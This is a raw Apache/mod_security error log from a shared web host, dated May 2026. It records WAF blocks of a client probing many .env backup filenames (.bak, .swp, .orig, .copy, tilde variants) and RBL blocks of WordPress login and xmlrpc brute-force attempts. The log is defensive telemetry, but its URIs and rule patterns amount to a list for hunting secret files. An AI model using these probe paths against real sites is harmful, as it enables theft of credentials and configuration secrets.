[Tue May 26 18:59:04.798452 2026] [proxy_http:error] [pid 1045635:tid 1045783] [client 208.84.101.20:48032] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:05.770529 2026] [security2:error] [pid 1045635:tid 1045866] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgIRhDcQXYr7SS5sUG3gAAAGU"]
[Tue May 26 18:59:06.457029 2026] [proxy:error] [pid 1045635:tid 1045820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:06.457108 2026] [proxy_http:error] [pid 1045635:tid 1045820] [client 208.84.101.20:48028] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:06.458020 2026] [proxy:error] [pid 1045635:tid 1045820] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:06.458070 2026] [proxy_http:error] [pid 1045635:tid 1045820] [client 208.84.101.20:48028] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:07.281482 2026] [security2:error] [pid 1045635:tid 1045834] [client 208.84.101.20:48052] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahWgIxhDcQXYr7SS5sUHBwAAAEU"]
[Tue May 26 18:59:07.285635 2026] [proxy:error] [pid 1045635:tid 1045861] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:07.285716 2026] [proxy_http:error] [pid 1045635:tid 1045861] [client 208.84.101.20:48042] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:07.286383 2026] [proxy:error] [pid 1045635:tid 1045861] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:07.286418 2026] [proxy_http:error] [pid 1045635:tid 1045861] [client 208.84.101.20:48042] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:07.287399 2026] [proxy:error] [pid 1045635:tid 1045845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:07.287478 2026] [proxy_http:error] [pid 1045635:tid 1045845] [client 208.84.101.20:48066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:07.288149 2026] [proxy:error] [pid 1045635:tid 1045845] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:07.288186 2026] [proxy_http:error] [pid 1045635:tid 1045845] [client 208.84.101.20:48066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:07.836028 2026] [security2:error] [pid 1045635:tid 1045874] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgIxhDcQXYr7SS5sUHDwAAAG0"]
[Tue May 26 18:59:08.080177 2026] [security2:error] [pid 1045635:tid 1045818] [client 208.84.101.20:63580] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahWgJBhDcQXYr7SS5sUHKQAAADU"]
[Tue May 26 18:59:08.080286 2026] [security2:error] [pid 1045635:tid 1045767] [client 208.84.101.20:63576] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.bak"] [unique_id "ahWgJBhDcQXYr7SS5sUHJwAAAAI"]
[Tue May 26 18:59:08.080288 2026] [security2:error] [pid 1045635:tid 1045782] [client 208.84.101.20:63602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production~"] [unique_id "ahWgJBhDcQXYr7SS5sUHKAAAABE"]
[Tue May 26 18:59:08.080765 2026] [security2:error] [pid 1045635:tid 1045841] [client 208.84.101.20:63558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.orig"] [unique_id "ahWgJBhDcQXYr7SS5sUHLQAAAEw"]
[Tue May 26 18:59:08.080804 2026] [security2:error] [pid 1045635:tid 1045791] [client 208.84.101.20:63612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahWgJBhDcQXYr7SS5sUHJAAAABo"]
[Tue May 26 18:59:08.081194 2026] [security2:error] [pid 1045635:tid 1045815] [client 208.84.101.20:63560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.copy"] [unique_id "ahWgJBhDcQXYr7SS5sUHKgAAADI"]
[Tue May 26 18:59:08.081344 2026] [security2:error] [pid 1045635:tid 1045805] [client 208.84.101.20:63540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahWgJBhDcQXYr7SS5sUHLgAAACg"]
[Tue May 26 18:59:08.081673 2026] [security2:error] [pid 1045635:tid 1045811] [client 208.84.101.20:63626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahWgJBhDcQXYr7SS5sUHJgAAAC4"]
[Tue May 26 18:59:08.081756 2026] [security2:error] [pid 1045635:tid 1045878] [client 208.84.101.20:63546] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.swp"] [unique_id "ahWgJBhDcQXYr7SS5sUHLwAAAHE"]
[Tue May 26 18:59:08.081846 2026] [security2:error] [pid 1045635:tid 1045773] [client 208.84.101.20:63590] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahWgJBhDcQXYr7SS5sUHJQAAAAg"]
[Tue May 26 18:59:08.082132 2026] [proxy:error] [pid 1045635:tid 1045772] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.082184 2026] [proxy_http:error] [pid 1045635:tid 1045772] [client 208.84.101.20:63376] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.082604 2026] [proxy:error] [pid 1045635:tid 1045802] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.082687 2026] [proxy_http:error] [pid 1045635:tid 1045802] [client 208.84.101.20:63598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.082776 2026] [proxy:error] [pid 1045635:tid 1045783] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.082819 2026] [proxy_http:error] [pid 1045635:tid 1045783] [client 208.84.101.20:63530] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.083103 2026] [security2:error] [pid 1045635:tid 1045810] [client 208.84.101.20:63516] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.backup"] [unique_id "ahWgJBhDcQXYr7SS5sUHMQAAAC0"]
[Tue May 26 18:59:08.083278 2026] [security2:error] [pid 1045635:tid 1045781] [client 208.84.101.20:63492] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.bak"] [unique_id "ahWgJBhDcQXYr7SS5sUHMgAAABA"]
[Tue May 26 18:59:08.083305 2026] [proxy:error] [pid 1045635:tid 1045802] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.083340 2026] [proxy_http:error] [pid 1045635:tid 1045802] [client 208.84.101.20:63598] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.083414 2026] [proxy:error] [pid 1045635:tid 1045783] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.083448 2026] [proxy_http:error] [pid 1045635:tid 1045783] [client 208.84.101.20:63530] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.083547 2026] [proxy:error] [pid 1045635:tid 1045772] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.083581 2026] [proxy_http:error] [pid 1045635:tid 1045772] [client 208.84.101.20:63376] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.084375 2026] [security2:error] [pid 1045635:tid 1045824] [client 208.84.101.20:63506] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local.old"] [unique_id "ahWgJBhDcQXYr7SS5sUHMwAAADs"]
[Tue May 26 18:59:08.085656 2026] [security2:error] [pid 1045635:tid 1045780] [client 208.84.101.20:63478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.copy"] [unique_id "ahWgJBhDcQXYr7SS5sUHNAAAAA8"]
[Tue May 26 18:59:08.086597 2026] [security2:error] [pid 1045635:tid 1045768] [client 208.84.101.20:63470] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.orig"] [unique_id "ahWgJBhDcQXYr7SS5sUHNgAAAAM"]
[Tue May 26 18:59:08.087802 2026] [security2:error] [pid 1045635:tid 1045817] [client 208.84.101.20:63454] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env~"] [unique_id "ahWgJBhDcQXYr7SS5sUHNwAAADQ"]
[Tue May 26 18:59:08.088021 2026] [security2:error] [pid 1045635:tid 1045820] [client 208.84.101.20:63426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.old"] [unique_id "ahWgJBhDcQXYr7SS5sUHPAAAADc"]
[Tue May 26 18:59:08.088090 2026] [security2:error] [pid 1045635:tid 1045832] [client 208.84.101.20:63428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.backup"] [unique_id "ahWgJBhDcQXYr7SS5sUHOQAAAEM"]
[Tue May 26 18:59:08.088449 2026] [security2:error] [pid 1045635:tid 1045891] [client 208.84.101.20:63422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.bak"] [unique_id "ahWgJBhDcQXYr7SS5sUHOwAAAH4"]
[Tue May 26 18:59:08.088507 2026] [proxy:error] [pid 1045635:tid 1045873] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.088582 2026] [proxy_http:error] [pid 1045635:tid 1045873] [client 208.84.101.20:63416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.089177 2026] [proxy:error] [pid 1045635:tid 1045873] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.089212 2026] [proxy_http:error] [pid 1045635:tid 1045873] [client 208.84.101.20:63416] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.089329 2026] [proxy:error] [pid 1045635:tid 1045806] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.089382 2026] [proxy_http:error] [pid 1045635:tid 1045806] [client 208.84.101.20:63438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.089434 2026] [security2:error] [pid 1045635:tid 1045794] [client 208.84.101.20:63458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.d2cargo.com"] [uri "/___proxy_subdomain_cpcalendars/.env.swp"] [unique_id "ahWgJBhDcQXYr7SS5sUHNQAAAB0"]
[Tue May 26 18:59:08.089562 2026] [proxy:error] [pid 1045635:tid 1045795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.089664 2026] [proxy_http:error] [pid 1045635:tid 1045795] [client 208.84.101.20:63390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.090078 2026] [proxy:error] [pid 1045635:tid 1045806] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.090123 2026] [proxy_http:error] [pid 1045635:tid 1045806] [client 208.84.101.20:63438] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.090286 2026] [proxy:error] [pid 1045635:tid 1045822] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.090353 2026] [proxy_http:error] [pid 1045635:tid 1045822] [client 208.84.101.20:63402] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.090670 2026] [proxy:error] [pid 1045635:tid 1045795] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.090710 2026] [proxy_http:error] [pid 1045635:tid 1045795] [client 208.84.101.20:63390] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:08.091202 2026] [proxy:error] [pid 1045635:tid 1045822] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:08.091248 2026] [proxy_http:error] [pid 1045635:tid 1045822] [client 208.84.101.20:63402] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:09.252659 2026] [proxy:error] [pid 1045635:tid 1045778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:09.252733 2026] [proxy_http:error] [pid 1045635:tid 1045778] [client 208.84.101.20:63590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:09.253656 2026] [proxy:error] [pid 1045635:tid 1045778] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 18:59:09.253705 2026] [proxy_http:error] [pid 1045635:tid 1045778] [client 208.84.101.20:63590] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 18:59:10.300456 2026] [security2:error] [pid 1045635:tid 1045806] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgJRhDcQXYr7SS5sUHcAAAACk"]
[Tue May 26 18:59:10.339442 2026] [security2:error] [pid 1045635:tid 1045792] [client 51.77.74.125:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "avprealty.com"] [uri "/index.php"] [unique_id "ahWgJBhDcQXYr7SS5sUHVAAAABs"]
[Tue May 26 18:59:10.732215 2026] [security2:error] [pid 1045635:tid 1045656] [remote 171.235.163.210:57876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 210.163.235.171.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgJhhDcQXYr7SS5sUHgAAAahQ"]
[Tue May 26 18:59:12.242185 2026] [security2:error] [pid 1045635:tid 1045666] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgJxhDcQXYr7SS5sUHoQAACB4"]
[Tue May 26 18:59:12.242456 2026] [security2:error] [pid 1045635:tid 1045773] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWgJxhDcQXYr7SS5sUHoQAACB4"]
[Tue May 26 18:59:12.492398 2026] [security2:error] [pid 1045635:tid 1045768] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgKBhDcQXYr7SS5sUHpwAAAAM"]
[Tue May 26 18:59:12.818001 2026] [security2:error] [pid 1045635:tid 1045664] [remote 196.188.249.61:44734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgKBhDcQXYr7SS5sUHvQAABhw"]
[Tue May 26 18:59:13.415521 2026] [security2:error] [pid 1045635:tid 1045663] [remote 196.188.249.61:44734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.249.188.196.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWgKRhDcQXYr7SS5sUHzAAADhs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:59:14.330830 2026] [security2:error] [pid 1045635:tid 1045866] [client 14.191.118.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgKRhDcQXYr7SS5sUH5gAAAGU"]
[Tue May 26 18:59:14.382734 2026] [security2:error] [pid 1045635:tid 1045788] [client 2.58.56.163:56337] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "preetishah.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWgKhhDcQXYr7SS5sUH8gAAABc"]
[Tue May 26 18:59:14.670307 2026] [security2:error] [pid 1045635:tid 1045827] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgKhhDcQXYr7SS5sUH7wAAAD4"]
[Tue May 26 18:59:15.192862 2026] [security2:error] [pid 1045635:tid 1045872] [client 2.58.56.163:60168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWgKhhDcQXYr7SS5sUIAQAAAGs"]
[Tue May 26 18:59:15.426572 2026] [security2:error] [pid 1045635:tid 1045681] [remote 103.95.119.103:55130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWgKxhDcQXYr7SS5sUICAAAaS0"]
[Tue May 26 18:59:15.802316 2026] [security2:error] [pid 1045635:tid 1045678] [remote 103.95.119.103:55130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahWgKxhDcQXYr7SS5sUIEQAAcCo"], referer: https://soto-plumbing.com/wp-login.php
[Tue May 26 18:59:17.132887 2026] [security2:error] [pid 1045635:tid 1045838] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWgLBhDcQXYr7SS5sUINgAAAEk"]
[Tue May 26 18:59:17.325606 2026] [security2:error] [pid 1045635:tid 1045825] [client 43.172.195.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWgLRhDcQXYr7SS5sUITgAAADw"]
